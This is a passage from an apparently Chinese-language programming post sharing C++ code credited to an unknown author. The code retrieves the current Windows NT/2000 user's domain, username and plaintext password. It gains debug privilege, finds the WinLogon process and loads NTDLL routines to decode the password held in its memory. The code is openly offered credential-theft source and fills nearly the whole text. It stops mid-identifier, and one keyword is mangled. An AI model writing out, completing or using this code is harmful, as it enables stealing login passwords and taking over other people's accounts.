本文所用的代碼原創作者已不知.是ccrun的一個朋友磨刀老頭提供給的,在此對作者表示感謝.經ccrun(老妖)在Win2k下試驗成功.
// 獲取WinNT/Win2k當前用戶名和密碼,調用以下函數即可:
// bool GetPassWord(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
//---------------------------------------------------------------------------
typedef strUCt _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
typedef struct _QUERY_SYSTEM_INFORMATION
{
DWORD GrantedAccess;
DWORD PID;
WORD HandleType;
WORD HandleId;
DWORD Handle;
}QUERY_SYSTEM_INFORMATION, *PQUERY_SYSTEM_INFORMATION;
typedef struct _PROCESS_INFO_HEADER
{
DWORD Count;
DWORD Unk04;
DWORD Unk08;
}PROCESS_INFO_HEADER, *PPROCESS_INFO_HEADER;
typedef struct _PROCESS_INFO
{
DWORD LoadAddress;
DWORD Size;
DWORD Unk08;
DWORD Enumerator;
DWORD Unk10;
char Name [0x108];
}PROCESS_INFO, *PPROCESS_INFO;
typedef struct _ENCODED_PASSWORD_INFO
{
DWORD HashByte;
DWORD Unk04;
DWORD Unk08;
DWORD Unk0C;
FILETIME LoggedOn;
DWORD Unk18;
DWORD Unk1C;
DWORD Unk20;
DWORD Unk24;
DWORD Unk28;
UNICODE_STRING EncodedPassword;
}ENCODED_PASSWORD_INFO, *PENCODED_PASSWORD_INFO;
typedef DWORD (__stdcall *PFNNTQUERYSYSTEMINFORMATION) (DWORD, PVOID, DWORD, PDWORD);
typedef PVOID (__stdcall *PFNRTLCREATEQUERYDEBUGBUFFER) (DWORD, DWORD);
typedef DWORD (__stdcall *PFNRTLQUERYPROCESSDEBUGINFORMATION) (DWORD, DWORD, PVOID);
typedef void (__stdcall *PFNRTLDESTROYQUERYDEBUGBUFFER) (PVOID);
typedef void (__stdcall *PFNTRTLRUNDECODEUNICODESTRING) (BYTE, PUNICODE_STRING);
// Private Prototypes
BOOL IsWinNT(void);
BOOL IsWin2K(void);
BOOL AddDebugPrivilege(void);
DWORD FindWinLogon(void);
BOOL LocatePasswordPageWinNT(DWORD, PDWORD);
BOOL LocatePasswordPageWin2K(DWORD, PDWORD);
void ReturnWinNTPwd(String &, String &, String &);
void ReturnWin2kPwd(String &, String &, String &);
bool GetPassword(String &, String &, String &);
// Global Variables
PFNNTQUERYSYSTEMINFORMATION pfnNtQuerySystemInformation;
PFNRTLCREATEQUERYDEBUGBUFFER pfnRtlCreateQueryDebugBuffer;
PFNRTLQUERYPROCESSDEBUGINFORMATION pfnRtlQueryProcessDebugInformation;
PFNRTLDESTROYQUERYDEBUGBUFFER pfnRtlDestroyQueryDebugBuffer;
PFNTRTLRUNDECODEUNICODESTRING pfnRtlRunDecodeUnicodeString;
DWORD dwPwdLen = 0;
PVOID pvRealPwd = NULL;
PVOID pvPwd = NULL;
DWORD dwHashByte = 0;
wchar_t wszUserName[0x400];
wchar_t wszUserDomain[0x400];
//---------------------------------------------------------------------------
bool GetPassword(String &strCurrDomain, String &strCurrUser, String &strCurrPwd)
{
if(!IsWinNT() && !IsWin2K())
{
// 只適合於2000或者XP
return false;
}
// Add debug privilege to PasswordReminder -
// this is needed for the search for WinLogon.
if(!AddDebugPrivilege())
{
// 不能夠添加debug特權
return false;
}
// debug特權已經成功加入到本程序
HINSTANCE hNtDll = LoadLibrary("NTDLL.DLL");
pfnNtQuerySystemInformation = (PFNNTQUERYSYSTEMINFORMATION)
GetProcAddress(hNtDll,"NtQuerySystemInformation");
pfnRtlCreateQueryDebugBuffer = (PFNRTLCREATEQUERYDEBUGBUFFER)
GetProcAddress(hNtDll,"RtlCreateQueryDebugBuffer");
pfnRtlQueryProcessDebugInformation =(PFNRTLQUERYPROCESSDEBUGINFORMATION)
GetProcAddress(hNtDll,"RtlQueryProcessDebugInformation");
pfnRtlDe
